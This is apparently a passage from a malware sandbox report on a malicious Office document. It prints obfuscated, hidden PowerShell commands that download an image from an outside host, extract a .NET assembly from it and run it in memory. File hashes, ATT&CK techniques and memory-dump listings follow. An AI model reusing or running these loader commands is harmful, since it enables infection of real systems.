bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€bQBw€€Ho€€YQBI€€Fo€€bgBh€€Ec€€c€€€€0€€Fk€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€VgB1€€GE€€W€€Bw€€DE€€WQB5€€Dg€€M€€BO€€Ho€€RQB1€€E4€€egBN€€HU€€TgBE€€FU€€eQBM€€Go€€VQ€€0€€E0€€Uw€€4€€HY€€TwBu€€EI€€M€€Bk€€Ec€€Zw€€9€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€GQ€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€YQBk€€HM€€YQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bl€€Cc€€I€€€€s€€C€€€€JwBj€€HU€€Jw€€p€€Ck€€';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2212
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmpzaHZnaGp4YjQ2ZXNhYmVuaXp1Yy80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
      4⤵
      Blocklisted process makes network request
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1296

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
03a4a6025bdc4ddeec21a6a228ed3394

SHA1
44db53ce80b23c5254e75f91e95271bd157ffbec

SHA256
ef1827b7c15d3b82077fc3d61485ca6c9f10725151ae225fb99a1dac61c160b0

SHA512
5fdf9b76c5945c26023e010ab7959a89e972ad21e2765ea21fc609637b5b53ddedcb0b5626791c08fdd93e3c213cc3247fbb15705bcdbe974ef5c26b2e84c337

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

Filesize
128KB

MD5
9445f9e1857b089a15d474823150166d

SHA1
e6906b23131b38c3d2238324c2daecdc60ae7718

SHA256
334dbe102539b9fb1497bc2657d8c779d9d065118935ce61157f6c225468e1a1

SHA512
8b50da4c9f0cafb8ca2d474db52c96e7c6d6ad48aafb543675feec08c9a93055353cce570adfbbe3e5e7e48d90a4b6fa3435d0eaf717411e9e4e030c3ca65d4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{EB364BCC-2D99-4641-844C-9374EA1EB793}.FSD

Filesize
128KB

MD5
f8bd12075795cd57a1e59a2b9970dba0

SHA1
f175514900b7693a29ba2d604774fd41ac2b0e23

SHA256
dfa2913d2a580662b3cab4bdffb8a78232d4705c3a51371321b08fd2e01c4af3

SHA512
67875b9b7417f1b00de938f38a0503f0f0a20018ed830255d1b17c60bb9d9c877d95b28778c4ead5b64845bf55a569b090c4ebd2cf0182dd89766be860997bf4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
70ca3ad425d992674a30e798a212e722

SHA1
a660c6cdf8c4212beb0f487f1fc74b64e721555b

SHA256
97fe52c41da2785d6e99cbe3c4a095a7e13b48925a33e1a299499d2f8b9806b2

SHA512
60a592d07eb66942c8149200c79d49bd40c95ac19af1a92ac650884807fab967b9ad5216f201bf12c7521cf068d83a2504533032b598851311bf9c9a4c508284

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{1C986245-F15A-44BA-81DD-33F9FE959246}.FSD

Filesize
128KB

MD5
1028d93b0f1abbd40036d819ea03c0ed

SHA1
8eb3a9051f76cc511cd843b0078870701925328a

SHA256
a51acc5c6b151b2fbf3b7572628331c73662ab50928b4172703510a3014457d7

SHA512
12c609e9bf1e3d37428e862dbfdaa968db3fbf7af7796ecaa3478b496eb72e5108eb3e10de5c45d47b6ad90af3e67a5400503904d080a3929ab14cfa06c2aae5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3FH71F1O\HTMLbrowserHistoryCleanerhta[1].doc

Filesize
25KB

MD5
a5e653641362ac4e0fae2c211a6fd38d

SHA1
cf8925381f865c63092bc5a059816f1f0c453ab4

SHA256
7089650e6c0f2dcead55e58ff0c229d4a9eba2d611c69b78b9d80986e0017ce0

SHA512
815558d48edccafe7b45d144a9d970604621931bfc11f7fe0b8ab05266053e245eb43f2cf5b64ca76aec16fcaed7c5742f3d800258b1aa069268f0ec914aab06

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3DA577A.doc

Filesize
25KB

MD5
a5e653641362ac4e0fae2c211a6fd38d

SHA1
cf8925381f865c63092bc5a059816f1f0c453ab4

SHA256
7089650e6c0f2dcead55e58ff0c229d4a9eba2d611c69b78b9d80986e0017ce0

SHA512
815558d48edccafe7b45d144a9d970604621931bfc11f7fe0b8ab05266053e245eb43f2cf5b64ca76aec16fcaed7c5742f3d800258b1aa069268f0ec914aab06

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab4DA5.tmp

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4E35.tmp

Filesize
163KB

MD5
9441737383d21192400eca82fda910ec

SHA1
725e0d606a4fc9ba44aa8ffde65bed15e65367e4

SHA256
bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

SHA512
7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\{36836336-DED0-477D-B305-ABB6E163E00A}

Filesize
128KB

MD5
4c6a4a6fda93fc2df0f57c6be3d9a38b

SHA1
1b385b1b9b1be1a795c7c72a4c74aefcac1b3c70

SHA256
fb26f316c39fb5572f7a9d7110c373e889cb0d4aa7df8c9b9f0ecdf8e91b2fbe

SHA512
6f2399f03da300efa0b84f001a471b77cd80ac804e8b8e5669243a4b8f898111b78be0780576b90c1f6bee88d136e6bea16c4824cd05255d2a7695df338726dd

Download Submit
C:\Users\Admin\AppData\Roaming\IEbrowserHtmlHistoryCleaner.hta

Filesize
112KB

MD5
9f5447784eb960df0833273eded3324c

SHA1
5f02059660b91f574d65387d47364d0909e13156

SHA256
2da026ec237903e5de38b8f9f37183229db7601933ad5e1f247a8f73a3cbf2cb

SHA512
d8ebb54c65df78d1a42bbe38ccb6c3bb5122616e21fd9e26608e7adfe2174f6efdfa60240459bc5562513e60f586a34f89fd900b14cc933dee712714b57eaaa0

Download Submit
C:\Users\Admin\AppData\Roaming\IEbrowserHtmlHistoryCleaner.hta

Filesize
112KB

MD5
9f5447784eb960df0833273eded3324c

SHA1
5f02059660b91f574d65387d47364d0909e13156

SHA256
2da026ec237903e5de38b8f9f37183229db7601933ad5e1f247a8f73a3cbf2cb

SHA512
d8ebb54c65df78d1a42bbe38ccb6c3bb5122616e21fd9e26608e7adfe2174f6efdfa60240459bc5562513e60f586a34f89fd900b14cc933dee712714b57eaaa0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
968dac51cb5c548ee295b1bdefb9f969

SHA1
aae2f327703158b45bdc5d380abaf58a91780a91

SHA256
63e75d4f81283a87eebbdf9cf4bc290a3d73e3b6c31b53200cdcb440e7c3d477

SHA512
2fdd585c3d20f8d6f8955a570664a3d0d7f3e4f74a2147bd5b0cce3fcc8b66f68da41c22c2e150f3690a46c114d0d624ddc75f884022440abacd0ddcaf59b73b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NTYGVRMX6IWOVJ8UAJ5H.temp

Filesize
7KB

MD5
480a79b0f3a1dc52e81767ec94d991ea

SHA1
a630ce1fab6cc63d8f0b36f453084137f86c3af4

SHA256
53fbc1adcb0b7f0a89826300d61b4edf61727709134d11c2869d2ef7fa1fd776

SHA512
08b119f4895de974c6884d0bf91df1b2d00622ff25c99155ef8f4c07f260dbc24ba690f7267d0be2e49edef85e662bb1c10a3447ba6d6673531d57843deecefc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
480a79b0f3a1dc52e81767ec94d991ea

SHA1
a630ce1fab6cc63d8f0b36f453084137f86c3af4

SHA256
53fbc1adcb0b7f0a89826300d61b4edf61727709134d11c2869d2ef7fa1fd776

SHA512
08b119f4895de974c6884d0bf91df1b2d00622ff25c99155ef8f4c07f260dbc24ba690f7267d0be2e49edef85e662bb1c10a3447ba6d6673531d57843deecefc

Download Submit
memory/1296-195-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-236-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-313-0x000000006A8D0000-0x000000006AE7B000-memory.dmp

Filesize
5.7MB

Download
memory/1296-252-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-250-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-248-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-246-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-185-0x000000006A8D0000-0x000000006AE7B000-memory.dmp

Filesize
5.7MB

Download
memory/1296-186-0x00000000024E0000-0x0000000002520000-memory.dmp

Filesize
256KB

Download
memory/1296-187-0x000000006A8D0000-0x000000006AE7B000-memory.dmp

Filesize
5.7MB

Download
memory/1296-244-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-242-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-240-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-238-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-234-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-190-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-191-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-193-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-228-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-197-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-199-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-201-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-203-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-205-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-207-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-209-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-232-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-212-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-214-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-216-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-218-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-220-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-222-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-224-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/1296-226-0x0000000008730000-0x0000000008A4C000-memory.dmp

Filesize
3.1MB

Download
memory/2108-179-0x000000007277D000-0x0000000072788000-memory.dmp

Filesize
44KB

Download
memory/2108-5223-0x000000007277D000-0x0000000072788000-memory.dmp

Filesize
44KB

Download
memory/2108-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2108-10-0x00000000023A0000-0x00000000023A2000-memory.dmp

Filesize
8KB

Download
memory/2108-1-0x000000007277D000-0x0000000072788000-memory.dmp

Filesize
44KB

Download
memory/2212-189-0x000000006A8D0000-0x000000006AE7B000-memory.dmp

Filesize
5.7MB

Download
memory/2212-229-0x0000000002400000-0x0000000002440000-memory.dmp

Filesize
256KB

Download
memory/2212-231-0x0000000002400000-0x0000000002440000-memory.dmp

Filesize
256KB

Download
memory/2212-211-0x0000000002400000-0x0000000002440000-memory.dmp

Filesize
256KB

Download
memory/2212-177-0x0000000002400000-0x0000000002440000-memory.dmp

Filesize
256KB

Download
memory/2212-174-0x000000006A8D0000-0x000000006AE7B000-memory.dmp

Filesize
5.7MB

Download
memory/2212-175-0x000000006A8D0000-0x000000006AE7B000-memory.dmp

Filesize
5.7MB

Download
memory/2212-176-0x0000000002400000-0x0000000002440000-memory.dmp

Filesize
256KB

Download
memory/2212-178-0x0000000002400000-0x0000000002440000-memory.dmp

Filesize
256KB

Download
memory/2840-5-0x000000002F521000-0x000000002F522000-memory.dmp

Filesize
4KB

Download
memory/2840-188-0x000000007277D000-0x0000000072788000-memory.dmp

Filesize
44KB

Download
memory/2840-7-0x000000007277D000-0x0000000072788000-memory.dmp

Filesize
44KB

Download
memory/2840-5201-0x000000007277D000-0x0000000072788000-memory.dmp

Filesize
44KB

Download
memory/2840-9-0x00000000024D0000-0x00000000024D2000-memory.dmp

Filesize
8KB

Download